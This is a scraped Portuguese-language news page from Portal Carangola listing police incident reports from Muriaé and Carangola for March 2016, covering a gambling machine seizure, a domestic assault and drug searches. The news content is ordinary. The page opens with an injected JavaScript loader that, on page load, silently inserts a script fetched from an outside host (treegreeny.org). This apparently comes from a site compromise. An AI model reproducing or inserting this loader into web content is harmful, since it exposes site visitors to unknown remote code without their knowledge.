;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 15 de março de 2016. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 15 de março de 2016.

pmmgesOCORRÊNCIAS DE DESTAQUE MURIAÉ – 15/03/2016

76ª CIA PM – MURIAÉ

PM EFETUA PRISÃO POR PRÁTICA DE JOGO DE AZAR EM MURIAÉ

Em 14/03/2016, por votla das 16h30min, na Rua Quinze de Novembro, no Bairro Santana, durante Batida Policial em um bar de propriedade de R.F.M.,de 37 anos, militares depararam com uma máquina de jogos de azar contendo em seu interior 01 aparelho de rádio, 01 chave com adaptação para 26 peças, 01 calculadora, 01 caixa de música no formato de uma lta de cerveja, além de R$ 2,00. Quanto à origem da máquina, o autor alegou que há aproximadamente 15 dias, um cidadão morador da cidade de Juiz de Fora, veio até o seu estabelecimento e ofereceu-lhe a referida máquina, alegando que ele ficaria com 20% do lucro e que viria uma vez por mês me Muriaé para realizar o acerto. Diante dos fatos, o autor foi preso e conduzido para a Delegacia de Polícia.

PM EFETUA PRISÃO POR LESÃO CORPORAL EM MURIAÉ

Em 15/03/2016, por volta das 00h10min, na Vila Aleozina Lina da Silveira, no Bairro Santo Antônio, a vítima F.F.O., de 34 anos, relatou que seu namorado, A.G.A., de 41 anos, chegou em casa e por ciúmes dela, começou a agredi-la com socos, pontapés e com um fio de telefone, provovando várias escoriações pelo corpo, além de um corte no pé direito. Relatou ainda que para se defender das agressões, jogou um pedaço de vidro na cabeça do autor, provocando um corte, sendo os dois encaminhados ao Hospital São Paulo. Durante busca pessoal, localizaram em poder do autor 02 invólucros de maconha e no interior da residência, 02 cachimbos para uso de crack. Diante dos fatos, foi dada voz de prisão em flagrante ao autor e durante a qualificação da envolvida, constataram haver um mandado de prisão em aberto em desfavor da mesma, momento em que também foi presa, sendo ambos conduzidos para a Delegacia de Polícia.

75ª CIA PM – CARANGOLA

PM CUMPRE MANDADO DE BUSCA E APREENSÃO EM CARANGOLA

Em 14/03/2016, por volta das 08h10min, na Rua José Homero da Silva, no Bairro Novos Tempos, em cumprimento de Mandado de Busca e Apreensão na residência de L.W.B., de 23 anos, militares lograram êxito em localizar 01 dichavador e maricas/bongue para uso de drogas, 01 munição cal.32/20. Já na residência de G.B., de 52 anos, pai do autor, este informou que possui várias armas com os respectivos registros, porém 01 carabina foi localizada sem qualquer tipo de documentação. Diante dos fatos, os autores foram presos e conduzidos para a Delegacia de Polícia.

PM APREENDE MATERIAIS RELACIONADOS AO TRÁFICO DE DROGAS EM CARANGOLA

Em 14/03/2016, por volta das 06h25min, na Rua Prefeito Antônio Ferreira da Silva, no Bairro Novos Tempos, em cumprimento de Mandado de Busca e Apreensão na residência de P.W.S., de 19 anos, militares foram recebidos por sua genitora e localizaram no quarto do autor 01 balança de precisão. O aparelho celular do autor recebia diversas ligações e mensagens de possíveis envolvidos com atividades ilícitas, motivo pelo qual foi recolhido. Encontaram ainda outro aparelho de celular da marca SAMSUNG que também foi recolhido. Após deixar a residência, militares receberam informação de que um comparsa do autor estaria guardando drogas em um terreno próximo a sua casa, militares localizaram um tubo de plástico contendo 03 pedras de crack. Os materiais foram apreendidos e encaminhados para a Delegacia de Polícia.

  ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.